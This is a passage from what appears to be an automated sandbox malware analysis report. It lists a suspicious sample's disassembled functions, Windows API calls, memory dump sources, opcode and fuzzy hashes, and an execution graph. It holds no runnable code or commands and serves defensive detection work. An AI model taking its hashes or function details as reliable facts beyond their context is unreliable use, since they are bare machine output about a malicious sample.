                                            • Opcode Fuzzy Hash: cb7aca4e0ddf707326432c7fd24ab7282cb68b5c1152aab3d27cb4035190f54d
                                            • Instruction Fuzzy Hash: E521E4B59002189FDB10CFAAD584AEEBFF8FB48310F14845AE918A3310D378A940CFA5
                                            Function 00B2B660 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B2B4C1,00000800,00000000,00000000), ref: 00B2B6D2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2097387726.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_b20000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 82a9a9514166f3018556a181004b3674890e7c85ce3826e61b371e5814b703b1
                                            • Instruction ID: 26d23135c9d22ac0c8299d75011576535d5976d25a9c117bbeb8a4cead69113b
                                            • Opcode Fuzzy Hash: 82a9a9514166f3018556a181004b3674890e7c85ce3826e61b371e5814b703b1
                                            • Instruction Fuzzy Hash: 871112B6C002499FDB10CF9AD844ADEFBF4EB88310F14846AD529A7300C779A945CFA5
                                            Function 00B2AC28 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B2B4C1,00000800,00000000,00000000), ref: 00B2B6D2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2097387726.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_b20000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 62329b00c307096cd9ce853392ea0f7dd195830c20c2473b5b1049f43abfaca5
                                            • Instruction ID: 9ea61d267be388575acfc8e1d0ff96949eadac470cb515b03e4bab0fdcc1daac
                                            • Opcode Fuzzy Hash: 62329b00c307096cd9ce853392ea0f7dd195830c20c2473b5b1049f43abfaca5
                                            • Instruction Fuzzy Hash: B11112B68003199FDB20DF9AD444AAEFBF4EB88310F10846EE519A7210C779A945CFA4
                                            Function 04D464B0 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,04D46416), ref: 04D4651E
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2104328334.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_4d40000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 02cd7e1cff55c90424fe37a1dc927f93dbc20278b9174e58c05ca42b9e6c0d02
                                            • Instruction ID: 54f4f818c07aa0afe7aea14513bfd2ae917814ded3521b899298d149a0d3b51c
                                            • Opcode Fuzzy Hash: 02cd7e1cff55c90424fe37a1dc927f93dbc20278b9174e58c05ca42b9e6c0d02
                                            • Instruction Fuzzy Hash: 511112B6C003498FDB20DFAAD444ADEFBF5AF98314F14842AD41AA7610D379A546CFA1
                                            Function 04D45F20 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,04D46416), ref: 04D4651E
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2104328334.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_4d40000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: da4fea4b5a115b115da9cbb2d7d6e223af8a531e1e0cf0beed212d1f9e1924ff
                                            • Instruction ID: fab12ebbf8b172db71528b4fb46193e02194c75636258d2fb4ec0a031f9a84d3
                                            • Opcode Fuzzy Hash: da4fea4b5a115b115da9cbb2d7d6e223af8a531e1e0cf0beed212d1f9e1924ff
                                            • Instruction Fuzzy Hash: 3F1112B2D006088FDB10DF9AD448A9EFBF4EF89314F10845AD419A7210D379A545CFA1
                                            Function 00B2B3E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00B2B446
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2097387726.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_b20000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: a34358b19aadd2a43ac3b38bc7676a7610972739dd1a1e37356860548b48a625
                                            • Instruction ID: 7db4fde459752edbff3a73e07d709dd566620c1cd3db9a841e7a6276f97cff1c
                                            • Opcode Fuzzy Hash: a34358b19aadd2a43ac3b38bc7676a7610972739dd1a1e37356860548b48a625
                                            • Instruction Fuzzy Hash: E711DFB6C006598FCB10DF9AD484A9EFBF4EF89314F10845AD529A7311C379A545CFA1
                                            Function 00ABD650 Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2096784265.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_abd000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc0c767a54bb1bbc39e6db6a6fd38fc668e878f86dd209a2aeaa467d78c683b9
                                            • Instruction ID: 93d52c840683a5877ce9b57d860321b205a57049f75dfdea5d6090b0000b22ad
                                            • Opcode Fuzzy Hash: cc0c767a54bb1bbc39e6db6a6fd38fc668e878f86dd209a2aeaa467d78c683b9
                                            • Instruction Fuzzy Hash: E6213675500244DFCB05DF14D9C0F56BFA9FB88314F248669E9090B257D33AD856DBA1
                                            Function 00ABD4C4 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2096784265.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_abd000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7811be23edac058d50d422eea855221b0211cf5b6d5b3d795e0196f6f5aabd09
                                            • Instruction ID: 13eada81078571a0270c8776826159a1489ed0656f7bf0fbcf64e4294241a6fb
                                            • Opcode Fuzzy Hash: 7811be23edac058d50d422eea855221b0211cf5b6d5b3d795e0196f6f5aabd09
                                            • Instruction Fuzzy Hash: 7E212271500244EFCB25DF14D9C0F66BF69FB98318F20C669E9090B257D33AD816DBA2
                                            Function 00ACD01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2096972483.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_acd000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f604e262491ca05cd32ce5ae87f69f844d00ba8856faf7edbe3d18a50482ec7
                                            • Instruction ID: c77ec993e05cba6791420f529ddcb65ec817d1b6d5c346f168420cf43e3dc5b7
                                            • Opcode Fuzzy Hash: 6f604e262491ca05cd32ce5ae87f69f844d00ba8856faf7edbe3d18a50482ec7
                                            • Instruction Fuzzy Hash: 0A21D075604204EFCB14DF28D984F26BFA5FB88314F20C57DD94A4B296C33AD807CA62
                                            Function 00ACD1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2096972483.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_acd000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0aa371f4eea56a147d933d58ed28276c117c22ab1c846f7b86c461131d47dbf3
                                            • Instruction ID: 18465f6137efa450db4058cdaad53d55bef4bd07d5de65ecd4aab9f59d0cd122
                                            • Opcode Fuzzy Hash: 0aa371f4eea56a147d933d58ed28276c117c22ab1c846f7b86c461131d47dbf3
                                            • Instruction Fuzzy Hash: A62104B1504204EFDB05DF24D9C0F26BBA5FB88314F24CA7DE9494B296C33AD806CA61
                                            Function 00ACD006 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2096972483.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_acd000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f7e2b68da844d8805b9334ebb9972e6009d08079dd8c2276c965d87483ae4525
                                            • Instruction ID: f6218b5563d2ff2f4df1068c2c59886c36c7bf632f4ebf715e84dca399f860d7
                                            • Opcode Fuzzy Hash: f7e2b68da844d8805b9334ebb9972e6009d08079dd8c2276c965d87483ae4525
                                            • Instruction Fuzzy Hash: 9A2180755093808FCB02CF24D994B15BF71EB46314F29C5EED8498F6A7C33A980ACB62
                                            Function 00ABD64B Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2096784265.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_abd000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                                            • Instruction ID: e6a83fee0f1d762c73fbd0cad3479815d2674e62fcef427c03bfbaedd44fcb0b
                                            • Opcode Fuzzy Hash: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                                            • Instruction Fuzzy Hash: B421C076404280DFCB06CF00D9C4B56BF72FB98314F24C6A9D9480A257C33AD856DB91
                                            Function 00ABD4BF Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2096784265.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_abd000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction ID: c44fc268c1b3ca2943010f6e729bf3460364f4dcb0739a22a7a83cb96502bc2d
                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction Fuzzy Hash: C811E676504280CFCB16CF14D5C4B56BF71FB98314F24C6A9D9490B657C33AD85ACBA2
                                            Function 00ACD1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2096972483.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_acd000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: ce4bbf5e03242bdba9b9281b656a25a9edc9ab8e43b289707d074af839d0c6c3
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: F0118B76504280DFDB16CF14D9C4B55BBA1FB84314F24C6AED8494B696C33AD84ACB62
                                            Function 00ABD7C5 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2096784265.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_abd000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cde4119e40e1f204a635d75000d948f13b28bbddffe2fa127ea1fad1ccecfaa5
                                            • Instruction ID: 259de73d83c18c497611a9c629dc450e76378d39bb2535fb9e41e6291de495e2
                                            • Opcode Fuzzy Hash: cde4119e40e1f204a635d75000d948f13b28bbddffe2fa127ea1fad1ccecfaa5
                                            • Instruction Fuzzy Hash: 93012B31004340DAD7208B56CD84BA7FFACEF55321F28C46AED080A297D6399840CAB1
                                            Function 00ABD7C4 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2096784265.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_abd000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f037e837cc38d8c12538511b192365c36423ec7a1517cdd1e2291ca349377364
                                            • Instruction ID: bded3d0158fd2756d41f0175dee395e032043f95905d6c9711c984782f51afdd
                                            • Opcode Fuzzy Hash: f037e837cc38d8c12538511b192365c36423ec7a1517cdd1e2291ca349377364
                                            • Instruction Fuzzy Hash: C0F0F071404344AEE7208F0ADD84BA2FFACEF95335F18C45AED080B287D2799C40CAB0

                                            Execution Graph

                                            Execution Coverage:10.5%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:28
                                            Total number of Limit Nodes:6
                                            execution_graph 28415 6940040 28416 6940082 28415->28416 28417 6940088 LoadLibraryExW 28415->28417 28416->28417 28418 69400b9 28417->28418 28419 1130848 28420 113084e 28419->28420 28421 113091b 28420->28421 28424 1131453 28420->28424 28430 1131356 28420->28430 28425 1131356 28424->28425 28427 113145b 28424->28427 28426 1131448 28425->28426 28428 1131453 GlobalMemoryStatusEx 28425->28428 28435 1137061 28425->28435 28426->28420 28427->28420 28428->28425 28434 113135b 28430->28434 28431 1131448 28431->28420 28432 1131453 GlobalMemoryStatusEx 28432->28434 28433 1137061 GlobalMemoryStatusEx 28433->28434 28434->28430 28434->28431 28434->28432 28434->28433 28437 113706b 28435->28437 28436 1137121 28436->28425 28437->28436 28440 5fad288 28437->28440 28444 5fad255 28437->28444 28441 5fad29d 28440->28441 28442 5fad4b2 28441->28442 28443 5fad4ca GlobalMemoryStatusEx 28441->28443 28442->28436 28443->28441 28445 5fad265 28444->28445 28446 5fad4b2 28445->28446 28447 5fad4ca GlobalMemoryStatusEx 28445->28447 28446->28436 28447->28445

                                            Executed Functions

                                            Function 0113CF00 Relevance: 2.2, Instructions: 2250COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b6c7c920f5b1caacd082df1aa50f6fe8c3c49aac4a06ca7cba8979647e3c405
                                            • Instruction ID: a64eb2b653096ba426db954254d78ea04750e2e7449f1bccc7e384011d8ab7a1
                                            • Opcode Fuzzy Hash: 4b6c7c920f5b1caacd082df1aa50f6fe8c3c49aac4a06ca7cba8979647e3c405
                                            • Instruction Fuzzy Hash: E8332E31D1071A8ECB15EF68C8906ADF7B1FF99300F15C69AE448B7215EB70AAD5CB81
                                            Function 01134190 Relevance: .3, Instructions: 281COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e19fc9640c6c20970229512ac3058813f584d226635bc87a257a9e5eede8da9d
                                            • Instruction ID: ebee5589be8f4aecc224f56c469e837bf33e4549a060a964a0e471a3bcf5ef08
                                            • Opcode Fuzzy Hash: e19fc9640c6c20970229512ac3058813f584d226635bc87a257a9e5eede8da9d
                                            • Instruction Fuzzy Hash: 6BB13D70E00219CFDF18CFA9D9857ADBBF2AF88314F148529D819A7658EB749846CF81
                                            Function 01134A60 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be993e820e28edd78e5459e991ee721751a55bc435da0d194e4b07490e310d6a
                                            • Instruction ID: 14d77754eb5364c2b38eb287d5215eda8e392cd2bc8dca29e98a7f827950c07f
                                            • Opcode Fuzzy Hash: be993e820e28edd78e5459e991ee721751a55bc435da0d194e4b07490e310d6a
                                            • Instruction Fuzzy Hash: 5DB15C70E00209CFDF18CFA9D9957ADBBF2AF88314F148529D419E7698EB749885CB81
                                            Function 01133E48 Relevance: .2, Instructions: 238COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8a6329274467f355a9e2302009dffb56ff6275aaa9f8d6f31125be8bd53d201f
                                            • Instruction ID: 0c6061a0e804ac5cc3e8f33cb41b9ef548789858e397413f53d5e3ce113316a1
                                            • Opcode Fuzzy Hash: 8a6329274467f355a9e2302009dffb56ff6275aaa9f8d6f31125be8bd53d201f
                                            • Instruction Fuzzy Hash: 55915E70E10209DFDF18CFA9C9857DDBBF2BF88314F148129E419A7298EB749845CB96
                                            Function 01136EA7 Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1716 1136ea7-1136f12 call 1136c10 1725 1136f14-1136f2d call 1136354 1716->1725 1726 1136f2e-1136f5d 1716->1726 1730 1136f5f-1136f62 1726->1730 1731 1136f64-1136f99 1730->1731 1732 1136f9e-1136fa1 1730->1732 1731->1732 1734 1136fa3-1136fb7 1732->1734 1735 1136fd4-1136fd7 1732->1735 1745 1136fb9-1136fbb 1734->1745 1746 1136fbd 1734->1746 1736 1136fe7-1136fea 1735->1736 1737 1136fd9 call 1137990 1735->1737 1738 1136ffe-1137000 1736->1738 1739 1136fec-1136ff3 1736->1739 1747 1136fdf-1136fe2 1737->1747 1743 1137002 1738->1743 1744 1137007-113700a 1738->1744 1741 1137170-1137177 1739->1741 1742 1136ff9 1739->1742 1742->1738 1743->1744 1744->1730 1748 1137010-113701f 1744->1748 1749 1136fc0-1136fcf 1745->1749 1746->1749 1747->1736 1752 1137021-1137024 1748->1752 1753 1137049-113705e 1748->1753 1749->1735 1755 113702c-1137047 1752->1755 1753->1741 1755->1752 1755->1753
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q
                                            • API String ID: 0-3917262905
                                            • Opcode ID: c3ef90c6595a75703f758cb8f93a721a441129d7d1c7d36723b7e16125b4afb1
                                            • Instruction ID: 32d18494d5e93a05c800f22930cb2a597c59c83bd9c5d43a0386aa065fbf23fb
                                            • Opcode Fuzzy Hash: c3ef90c6595a75703f758cb8f93a721a441129d7d1c7d36723b7e16125b4afb1
                                            • Instruction Fuzzy Hash: 0151E470E042099FDB2ADFB9C4507AEBBB2EF85304F108469E405EB285DB759C46CB52
                                            Function 05FAE088 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4502415120.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_5fa0000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8314c813f227c8b87241b4304abe9c8c8514073397c01f6719fe72f5f634957c
                                            • Instruction ID: b350ec8ae1384f881fe255030c909086bf070ce0527a60e66f150b9d241458e9
                                            • Opcode Fuzzy Hash: 8314c813f227c8b87241b4304abe9c8c8514073397c01f6719fe72f5f634957c
                                            • Instruction Fuzzy Hash: 694103B2D102598FCB04CF79D8447DABBF9EF89310F14866AD504A7351EBB8A941CBE1
                                            Function 06940006 Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 069400AA
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4503330638.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_6940000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 6cf4bc36202058e187ce9c3f3e9f3aa0a18d34497e43ffb6fdd41e5769981d6e
                                            • Instruction ID: f30f4d29f7aa5c002b471a7d8eb3c2204a3e8346becc7112a2788c668f6a0900
                                            • Opcode Fuzzy Hash: 6cf4bc36202058e187ce9c3f3e9f3aa0a18d34497e43ffb6fdd41e5769981d6e
                                            • Instruction Fuzzy Hash: 5321ABB18043488FCB11CFAAC844A9ABFF8FF4A310F15806AD455AB251C379A945CFA1
                                            Function 06940040 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 069400AA
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4503330638.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_6940000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 61c27d3dbde0b1622d8949d9525fab2f425be2dde6b025f093cb416e35938660
                                            • Instruction ID: 3ac4092b502bf42aa3f3c2236c6fa55ba47fe6e9bb07728ee387c87d9c95f982
                                            • Opcode Fuzzy Hash: 61c27d3dbde0b1622d8949d9525fab2f425be2dde6b025f093cb416e35938660
                                            • Instruction Fuzzy Hash: 7011F3B6C003498FDB20DF9AC444ADEFBF9FB88310F10842AD559A7600C379A545CFA5
                                            Function 05FAE170 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(000000F9), ref: 05FAE1D7
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4502415120.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_5fa0000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 215f65135836f7f2e23329c4c625c8839f8abbe35fdc18a15b788014ee235e59
                                            • Instruction ID: 75b8fd73da327ac26c0edaa00dc4ba62f6ee1e92721c76a1ad4453f48ba2894e
                                            • Opcode Fuzzy Hash: 215f65135836f7f2e23329c4c625c8839f8abbe35fdc18a15b788014ee235e59
                                            • Instruction Fuzzy Hash: 2911E4B1C006599BCB10DF9AC544A9EFBF8BF48710F14816AD918A7240D778A944CFA5
                                            Function 0113F45D Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: 008a01c6f33beea30abad6618c8f3f244450898b2b483f770d6d5687b7873a64
                                            • Instruction ID: bab4317508848fe696713134cc5581098f0f3a00c1b0d22ac25572f072d326e6
                                            • Opcode Fuzzy Hash: 008a01c6f33beea30abad6618c8f3f244450898b2b483f770d6d5687b7873a64
                                            • Instruction Fuzzy Hash: E241A031B002028FDB0A9B78955476E3BE6AFC9210F144569D406EB399DF39DD4ACB92
                                            Function 01136F48 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 692653e03836419756ea84c3b2eee2edad252983e07104d4ac4acf52fb3a85da
                                            • Instruction ID: 679d9e2958dfa4466185acf4a904a41c2661e830bd751ff56fbd2587d91e1c8c
                                            • Opcode Fuzzy Hash: 692653e03836419756ea84c3b2eee2edad252983e07104d4ac4acf52fb3a85da
                                            • Instruction Fuzzy Hash: AE319270E102099BDF29CFA9C450B9EF7B5EF85314F108529E405EB289EB75E942CB52
                                            Function 01136B71 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: ccb3293f42f98bc03c5b66f524ed18eaef42a740dfb372d9a4c6f3931d1e51ae
                                            • Instruction ID: 03cbeddb9ff18eb2ff073fe43553092ede98eca479ff58ddbff1df5cd5aa8a9c
                                            • Opcode Fuzzy Hash: ccb3293f42f98bc03c5b66f524ed18eaef42a740dfb372d9a4c6f3931d1e51ae
                                            • Instruction Fuzzy Hash: 7421A1317081405FCB0AAB7C94646EE3BF2DF86310F1144AAD049DB39ADA2A8D4BC792
                                            Function 01137990 Relevance: .6, Instructions: 555COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.4490563665.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_1130000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c227bcefdf01f681da15d9527f88583ea0204771a11313e8af8f833c7a0a5919
                                            • Instruction ID: 25ecbe1aeaa4e09c332752e6016e766f548e63acc6b12d0654f339aa2e644289
                                            • Opcode Fuzzy Hash: c227bcefdf01f681da15d9527f88583ea0204771a11313e8af8f833c7a0a5919
                                            • Instruction Fuzzy Hash: 57124F707001028BCB2AAB78E49562D76A6EBC5305F104E3DE005DB76ADF75EC86CB91
                                            Function 01139768 Relevance: .4, Instructions: 355COMMON
                                            Download Yara Rule
                                            Memory Dump Source
